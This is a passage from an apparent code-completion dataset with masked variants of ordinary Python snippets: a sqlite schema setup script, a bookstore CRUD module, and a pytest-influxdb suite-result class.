(\"==========================百度 第%s页采集结束================\\n\"%(page_num)) \n \n ",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import sqlite3
if __name__ == '__main__':
conn = sqlite3.connect('donations.sqlite')
c = conn.cursor()
query = """DROP TABLE IF EXISTS factions;"""
c.execute(query)
query = """DROP TABLE IF EXISTS members;"""
c.execute(query)
query = """DROP TABLE IF EXISTS bank;"""
c.execute(query)
conn.commit()
query = """CREATE TABLE factions(
id INTEGER PRIMARY KEY,
faction INTEGER UNIQUE,
faction_name TEXT);"""
c.execute(query)
conn.commit()
query = """CREATE TABLE members(
id INTEGER PRIMARY KEY,
member INTEGER UNIQUE,
member_name TEXT,
faction INTEGER,
FOREIGN KEY(faction) REFERENCES factions(faction));"""
c.execute(query)
conn.commit()
query = """CREATE TABLE bank(
id INTEGER PRIMARY KEY,
stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
member INTEGER UNIQUE,
money_balance INTEGER,
point_balance INTEGER,
FOREIGN KEY (member) REFERENCES members(member));"""
c.execute(query)
conn.commit()
|
normal
|
{
"blob_id": "b6b8dfaa9644fa4f4c250358b89f4a30c26c317f",
"index": 4788,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-3": "import sqlite3\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-4": "import sqlite3\n\n\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n\n query = \"\"\"DROP TABLE IF EXISTS factions;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS members;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS bank;\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
<|reserved_special_token_0|>
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'
)
connect.commit()
connect.close()
<|reserved_special_token_0|>
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
def search(title='', author='', year='', isbn=''):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',
(title, author, year, isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'
)
connect.commit()
connect.close()
def insert(title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,
author, year, isbn))
connect.commit()
connect.close()
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
def search(title='', author='', year='', isbn=''):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',
(title, author, year, isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'
)
connect.commit()
connect.close()
def insert(title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,
author, year, isbn))
connect.commit()
connect.close()
def view():
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('SELECT * FROM bookstore')
books = cursor.fetchall()
connect.close()
return books
def search(title='', author='', year='', isbn=''):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',
(title, author, year, isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))
connect.commit()
connect.close()
def update(id, title, author, year, isbn):
connect = sqlite3.connect('books.db')
cursor = connect.cursor()
cursor.execute(
'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',
(title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
connect()
<|reserved_special_token_1|>
import sqlite3
def connect():
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,"
"title TEXT,"
"author TEXT,"
"year INTEGER,"
"isbn INTEGER)"
)
connect.commit()
connect.close()
def insert(title,author,year,isbn):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("INSERT INTO bookstore VALUES (NULL,?,?,?,?)",(title, author, year, isbn))
connect.commit()
connect.close()
def view():
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("SELECT * FROM bookstore")
books = cursor.fetchall()
connect.close()
return books
def search(title="", author="", year="", isbn=""):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("SELECT * FROM bookstore WHERE title=?"
"OR author=?"
"OR year=?"
"OR isbn=?", (title,author,year,isbn))
books = cursor.fetchall()
connect.close()
return books
def delete(id):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("DELETE FROM bookstore WHERE id=?", (id,))
connect.commit()
connect.close()
def update(id,title,author,year,isbn):
connect = sqlite3.connect("books.db")
cursor = connect.cursor()
cursor.execute("UPDATE bookstore SET title=?, author=?, year=?, isbn=?"
"WHERE id=?", (title, author, year, isbn, id))
connect.commit()
connect.close()
def close():
return True
connect()
# insert("Holy Bible", "Joseph Smith", 1823, 123456)
# print(view())
|
flexible
|
{
"blob_id": "d7d23b04f6e73db6a0a8730192398941743f32ce",
"index": 6800,
"step-1": "<mask token>\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\n<mask token>\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef connect():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'\n )\n connect.commit()\n connect.close()\n\n\n<mask token>\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef search(title='', author='', year='', isbn=''):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',\n (title, author, year, isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef connect():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'\n )\n connect.commit()\n connect.close()\n\n\ndef insert(title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,\n author, year, isbn))\n connect.commit()\n connect.close()\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef search(title='', author='', year='', isbn=''):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',\n (title, author, year, isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef connect():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,title TEXT,author TEXT,year INTEGER,isbn INTEGER)'\n )\n connect.commit()\n connect.close()\n\n\ndef insert(title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('INSERT INTO bookstore VALUES (NULL,?,?,?,?)', (title,\n author, year, isbn))\n connect.commit()\n connect.close()\n\n\ndef view():\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('SELECT * FROM bookstore')\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef search(title='', author='', year='', isbn=''):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'SELECT * FROM bookstore WHERE title=?OR author=?OR year=?OR isbn=?',\n (title, author, year, isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\n\ndef delete(id):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute('DELETE FROM bookstore WHERE id=?', (id,))\n connect.commit()\n connect.close()\n\n\ndef update(id, title, author, year, isbn):\n connect = sqlite3.connect('books.db')\n cursor = connect.cursor()\n cursor.execute(\n 'UPDATE bookstore SET title=?, author=?, year=?, isbn=?WHERE id=?',\n (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\n\ndef close():\n return True\n\n\nconnect()\n",
"step-5": "import sqlite3\n\ndef connect():\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"CREATE TABLE IF NOT EXISTS bookstore (id INTEGER PRIMARY KEY,\"\n \"title TEXT,\"\n \"author TEXT,\"\n \"year INTEGER,\"\n \"isbn INTEGER)\"\n )\n connect.commit()\n connect.close()\n\ndef insert(title,author,year,isbn):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"INSERT INTO bookstore VALUES (NULL,?,?,?,?)\",(title, author, year, isbn))\n connect.commit()\n connect.close()\n\ndef view():\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"SELECT * FROM bookstore\")\n books = cursor.fetchall()\n connect.close()\n return books\n\ndef search(title=\"\", author=\"\", year=\"\", isbn=\"\"):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"SELECT * FROM bookstore WHERE title=?\"\n \"OR author=?\"\n \"OR year=?\"\n \"OR isbn=?\", (title,author,year,isbn))\n books = cursor.fetchall()\n connect.close()\n return books\n\ndef delete(id):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"DELETE FROM bookstore WHERE id=?\", (id,))\n connect.commit()\n connect.close()\n\ndef update(id,title,author,year,isbn):\n connect = sqlite3.connect(\"books.db\")\n cursor = connect.cursor()\n cursor.execute(\"UPDATE bookstore SET title=?, author=?, year=?, isbn=?\"\n \"WHERE id=?\", (title, author, year, isbn, id))\n connect.commit()\n connect.close()\n\ndef close():\n return True\n\n\n\nconnect()\n# insert(\"Holy Bible\", \"Joseph Smith\", 1823, 123456)\n# print(view())\n\n",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
import json
import time
from pytest_influxdb.data_manager import DataManager
class SuiteResultDTO:
__run = 'UNDEFINED'
__project = 'UNDEFINED'
__version = 'UNDEFINED'
__passed = None
__failed = None
__skipped = None
__error = None
__duration_sec = 0
__disabled = 0
__retries = 0
__suite_result_dict = {'tags': {}, 'fields': {}}
def set_run(self, run):
if run != '':
self.__run = str(run)
def set_project(self, project):
if project != '':
self.__project = str(project)
def set_version(self, version):
if version != '':
self.__version = str(version)
def set_passed(self, passed):
self.__passed = int(passed)
def set_failed(self, failed):
self.__failed = int(failed)
def set_skipped(self, skipped):
self.__skipped = int(skipped)
def set_error(self, error):
self.__error = int(error)
def set_duration_sec(self, duration_sec):
self.__duration_sec = int(duration_sec)
def set_disabled(self, disabled):
self.__disabled = int(disabled)
def set_retries(self, retries):
self.__retries = int(retries)
def set_suite_result_dict(self, suite_result_dict):
SuiteResultDTO.__suite_result_dict = suite_result_dict
def get_suite_json(self, measurement_name):
json_body = [
{
"measurement": measurement_name,
"tags": {
"run": self.__run,
"project": self.__project,
"version": self.__version
},
"fields": {
"pass": self.__passed,
"fail": self.__failed,
"skip": self.__skipped,
"error": self.__error,
"disabled": self.__disabled,
"duration_sec": self.__duration_sec,
"retries": self.__retries
}
}
]
# Appending custom values to json_body
tags_dict = SuiteResultDTO.__suite_result_dict['tags']
for key in tags_dict:
suite_tags = json_body[0]['tags']
suite_tags.update({key: tags_dict[key]})
fields_dict = SuiteResultDTO.__suite_result_dict['fields']
for key in fields_dict:
suite_fields = json_body[0]['fields']
suite_fields.update({key: fields_dict[key]})
return json_body
def set_tag_values(self, tags_dict):
suite_tags = SuiteResultDTO.__suite_result_dict
suite_tags['tags'].update(tags_dict)
def set_field_values(self, fields_dict):
suite_fields = SuiteResultDTO.__suite_result_dict
suite_fields['fields'].update(fields_dict)
def set_suite_custom_values(self, influxdb_values):
if influxdb_values and influxdb_values != '':
if isinstance(influxdb_values, str):
influxdb_values = json.loads(influxdb_values)
self.set_field_values(influxdb_values['fields']['suite_result'])
self.set_tag_values(influxdb_values['tags']['suite_result'])
def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):
# Preparing execution time and suite results from the terminalreporter (where all the data collected)
execution_time = round(time.time() - terminalreporter._sessionstarttime)
suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)
# Setting the values to the suite_result_dto instance
self.set_passed(suite_results_dict.get('passed'))
self.set_failed(suite_results_dict.get('failed'))
self.set_skipped(suite_results_dict.get('skipped'))
self.set_error(suite_results_dict.get('error'))
self.set_disabled(suite_results_dict.get('disabled'))
self.set_duration_sec(execution_time)
self.set_retries(suite_results_dict.get('reruns'))
self.set_run(global_values.get("run"))
self.set_project(global_values.get("project"))
self.set_version(global_values.get("version"))
self.set_suite_custom_values(global_values.get("influxdb_values"))
self.merge_suite_result(global_values.get('merged'), influxdb_components,
db_measurement_name_for_suite, global_values.get("run"))
return self
def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):
# Merging the existing suite results with the suite_results from db for the same run
# if 'merged' config value is True
existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)
old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))
if len(old_suite_list) != 0 and merged_enabled:
old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][
'skip']
old_disabled_tests_count = old_suite_list[0]['disabled']
self.set_passed(
old_suite_total_count - self.__failed - self.__skipped)
self.set_disabled(old_disabled_tests_count)
influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)
|
normal
|
{
"blob_id": "84c3427a994bd6c57d9fa8449e4fc7a3de801170",
"index": 9271,
"step-1": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n <mask token>\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-2": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-3": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
